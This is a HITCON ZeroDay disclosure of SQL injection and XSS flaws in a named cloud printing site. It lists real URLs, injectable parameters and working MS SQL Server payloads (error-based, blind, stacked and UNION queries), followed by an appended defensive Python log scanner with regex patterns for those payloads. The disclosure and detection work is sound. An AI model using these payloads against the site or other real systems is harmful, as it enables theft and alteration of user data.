永豐雲端印刷網 SQL injection and XSS - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2016-00206
  • Vendor: 永豐紙業股份有限公司
  • Title: 永豐雲端印刷網 SQL injection and XSS
  • Introduction: SQL injection and XSS

Handling Status

Current Status

Public
Last Update : 2016/11/17
  • New submission
  • Reviewed
  • Reported to vendor
  • Fix status not reported
  • Not retested
  • Public

Processing History

  • 2016/09/15 03:27:21 : New submission (status updated by WhiteCat)
  • 2016/09/26 09:13:19 : Review completed (status updated by the HITCON ZeroDay service team)
  • 2016/09/27 23:27:38 : Reported, no response from vendor (status updated by the HITCON ZeroDay service team)
  • 2016/11/15 03:00:02 : Public (status updated by the HITCON ZeroDay service team)
  • 2016/11/17 01:00:04 : Public (updated automatically by the HITCON ZeroDay platform)

Details

  • ZDID: ZD-2016-00206
  • Reporter: andyw330 (WhiteCat)
  • Risk: High
  • Type: Database injection attack (SQL Injection)

References

An attacker can exploit this vulnerability to gain access to the backend database and its complete contents (including large amounts of user personal or other sensitive data), and may also be able to destroy or modify that data.

Vulnerability description: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

Vulnerability description: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

Vulnerability description: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

Mitigation: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(This field is generated automatically by the system from the vulnerability category, as reference material for the vulnerability.)

Related URLs

XSS: (there are too many; only one is given as an example)
http://www.cloudw2p.com/site/product4.php?type=alert("XSS")

SQL injection:
https://www.cloudw2p.com/site/logincheck.php
http://www.cloudw2p.com/site/member_Search_product.php
http://www.cloudw2p.com/site/photo_show_info.php?obj=95751fec0b73563e8e8bba6c4ce24a3e2b7624bd
http://www.cloudw2p.com/site/photo_show.php?show=all&page=2&&BTYPE=%&iBOOKNAME=
http://www.cloudw2p.com/site/design/mydesign_detail.php?WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf
http://www.cloudw2p.com/site/design/mydesign_author.php?designername=Top
http://www.cloudw2p.com/site/design/index.php?designername=&show=notebook1&info=&page=2&&iBOOKNAME=&O=X

Description

There are far too many vulnerable pages,
so only some of the pages and injection points are listed here.

https://www.cloudw2p.com/site/logincheck.php

Parameter: iid2 (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: iid2=' AND 4365=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (4365=4365) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(106)+CHAR(113))) AND 'nsKd'='nsKd&ipass2=
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: iid2=' AND 6106=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'LaLo'='LaLo&ipass2=
Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)

http://www.cloudw2p.com/site/member_Search_product.php

Parameter: BTYPE (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: BTYPE=85-2' AND 4395=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4395=4395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(113)+CHAR(113))) AND 'BVxy'='BVxy&OPDAYS1=3&PPID=100&number=3&ppWUNIT=56&num=3&WUNIT=&papertotle=168&UNIT702=15&num702=&totle702=0&ship2=75&ship=75&OPDAYS=3&Response=243
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

http://www.cloudw2p.com/site/photo_show_info.php?obj=95751fec0b73563e8e8bba6c4ce24a3e2b7624bd

Parameter: obj (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: obj=95751fec0b73563e8e8bba6c4ce24a3e2b7624bd' AND 6940=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (6940=6940) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(98)+CHAR(113))) AND 'eVaC'='eVaC
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: obj=95751fec0b73563e8e8bba6c4ce24a3e2b7624bd' AND 4918=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'gWSy'='gWSy
Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)

http://www.cloudw2p.com/site/photo_show.php?show=all&page=2&&BTYPE=%&iBOOKNAME=

Parameter: show (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: show=all' AND 1054=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1054=1054) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'xeZr'='xeZr&page=2&&BTYPE=%&iBOOKNAME=
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Parameter: iBOOKNAME (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: show=all&page=2&&BTYPE=%&iBOOKNAME=%' AND 3785=3785 AND '%'='
Vector: AND [INFERENCE]

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: show=all&page=2&&BTYPE=%&iBOOKNAME=%' AND 9616=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9616=9616) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113))) AND '%'='
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Parameter: BTYPE (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: show=all&page=2&&BTYPE=%' AND 7206=7206 AND 'IkHL'='IkHL&iBOOKNAME=
Vector: AND [INFERENCE]

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: show=all&page=2&&BTYPE=%' AND 4249=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4249=4249) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'csQp'='csQp&iBOOKNAME=
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

http://www.cloudw2p.com/site/design/mydesign_detail.php?WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf

Parameter: WBID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf' AND 8402=8402 AND 'mrTO'='mrTO
Vector: AND [INFERENCE]

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf' AND 6199=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6199=6199) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113))) AND 'JfVg'='JfVg
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf';WAITFOR DELAY '0:0:5'--
Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf' WAITFOR DELAY '0:0:5'--
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(121)+CHAR(110)+CHAR(71)+CHAR(106)+CHAR(68)+CHAR(81)+CHAR(73)+CHAR(81)+CHAR(101)+CHAR(112)+CHAR(65)+CHAR(84)+CHAR(97)+CHAR(112)+CHAR(104)+CHAR(103)+CHAR(87)+CHAR(100)+CHAR(83)+CHAR(97)+CHAR(70)+CHAR(65)+CHAR(83)+CHAR(112)+CHAR(114)+CHAR(84)+CHAR(78)+CHAR(65)+CHAR(76)+CHAR(120)+CHAR(121)+CHAR(100)+CHAR(111)+CHAR(86)+CHAR(112)+CHAR(111)+CHAR(108)+CHAR(112)+CHAR(81)+CHAR(72)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- inee
Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]

http://www.cloudw2p.com/site/design/mydesign_author.php?designername=Top

Parameter: designername (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: designername=Top') AND 7728=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7728=7728) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)))-- Xlnc
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: designername=Top') OR 8944=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- pmCF
Vector: OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)

http://www.cloudw2p.com/site/design/index.php?designername=&show=notebook1&info=&page=2&&iBOOKNAME=&O=X

Parameter: designername (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: designername=') AND 2465=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (2465=2465) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113))) AND ('jhUA'='jhUA&show=notebook1&info=&page=2&&iBOOKNAME=&O=X
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: designername=');WAITFOR DELAY '0:0:5'--&show=notebook1&info=&page=2&&iBOOKNAME=&O=X
Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: designername=') UNION ALL SELECT NULL,CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(100)+CHAR(112)+CHAR(117)+CHAR(65)+CHAR(87)+CHAR(117)+CHAR(98)+CHAR(104)+CHAR(82)+CHAR(97)+CHAR(86)+CHAR(67)+CHAR(67)+CHAR(107)+CHAR(70)+CHAR(122)+CHAR(74)+CHAR(69)+CHAR(115)+CHAR(112)+CHAR(112)+CHAR(65)+CHAR(108)+CHAR(67)+CHAR(120)+CHAR(66)+CHAR(87)+CHAR(84)+CHAR(71)+CHAR(103)+CHAR(72)+CHAR(106)+CHAR(74)+CHAR(97)+CHAR(114)+CHAR(107)+CHAR(115)+CHAR(89)+CHAR(72)+CHAR(72)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- dBwy&show=notebook1&info=&page=2&&iBOOKNAME=&O=X
Vector:  UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]

Parameter: iBOOKNAME (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: designername=&show=notebook1&info=&page=2&&iBOOKNAME=%' AND 4246=4246 AND '%'='&O=X
Vector: AND [INFERENCE]

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: designername=&show=notebook1&info=&page=2&&iBOOKNAME=%' AND 5996=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5996=5996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113))) AND '%'='&O=X
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
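As an added defensive example (not part of the report and not the site's own code), the following Python flags web requests whose query strings carry the vector families listed above for this Microsoft SQL Server backend, and decodes the CHAR()-concatenated literals so an analyst reading logs can see the marker strings the error-based probes try to echo back through a conversion error. The log lines are constructed for the example, in a simplified "METHOD target status" format.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Regexes for the vector families this report lists against the MS SQL Server backend;
# they are matched case-insensitively against the URL-decoded query string.
SIGNATURES = {
    "error-based (CONVERT to INT)": re.compile(r"CONVERT\(\s*INT\s*,\s*\(\s*SELECT", re.I),
    "time-based blind (WAITFOR DELAY)": re.compile(r"WAITFOR\s+DELAY\s+'", re.I),
    "time-based blind (heavy sysusers self-join)": re.compile(r"FROM\s+sysusers\s+AS\s+sys1", re.I),
    "UNION query (NULL columns)": re.compile(r"UNION\s+ALL\s+SELECT\s+NULL", re.I),
    "boolean-based blind (n=n)": re.compile(r"\bAND\s+(\d+)=\1\b", re.I),
}
# CHAR(n)+CHAR(n)+... is how these payloads spell out string literals without quotes.
CHAR_RUN = re.compile(r"(?:CHAR\(\d+\)\+)*CHAR\(\d+\)", re.I)

# Constructed sample access-log lines (not taken from the report), "METHOD target status".
SAMPLE_LOG = [
    "GET /site/photo_show.php?show=all&page=2 200",
    "GET /site/design/mydesign_detail.php?WBID=abc'%20WAITFOR%20DELAY%20'0:0:5'-- 200",
    "GET /site/photo_show_info.php?obj=abc'%20AND%206940=CONVERT(INT,(SELECT%20CHAR(113)%2BCHAR(98)"
    "%2BCHAR(112)%2BCHAR(112)%2BCHAR(113)%2B(SELECT%20(CASE%20WHEN%20(6940=6940)%20THEN%20CHAR(49)"
    "%20ELSE%20CHAR(48)%20END))%2BCHAR(113)%2BCHAR(122)%2BCHAR(106)%2BCHAR(98)%2BCHAR(113)))"
    "%20AND%20'eVaC'='eVaC 500",
    "GET /site/design/mydesign_author.php?designername=Top')%20OR%208944=(SELECT%20COUNT(*)"
    "%20FROM%20sysusers%20AS%20sys1,sysusers%20AS%20sys2)--%20pmCF 200",
    "GET /site/photo_show.php?show=all&iBOOKNAME=%25'%20AND%203785=3785%20AND%20'%25'=' 200",
]

def decode_char_runs(sql):
    """Decode every CHAR()-concatenated literal in the text to plain ASCII."""
    found = []
    for run in CHAR_RUN.finditer(sql):
        codes = re.findall(r"\d+", run.group(0))
        found.append("".join(chr(int(c)) for c in codes))
    return found

def classify_request(log_line):
    """Inspect one log line and report which vector families its query string matches."""
    url = urlsplit(log_line.split()[1])
    query = unquote_plus(url.query)  # undo %xx and '+' encoding before matching
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(query))
    # Decoded CHAR() literals reveal the marker strings the probe tries to echo back.
    return {"path": url.path, "techniques": hits,
            "decoded_literals": decode_char_runs(query) if hits else []}

def scan(lines):
    """Return findings for every request that matches at least one signature."""
    return [r for r in map(classify_request, lines) if r["techniques"]]
```

The signatures cover only the vector families recorded in this report; they are a triage aid for log review, not a substitute for the parameterized queries the cheat sheet above recommends.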
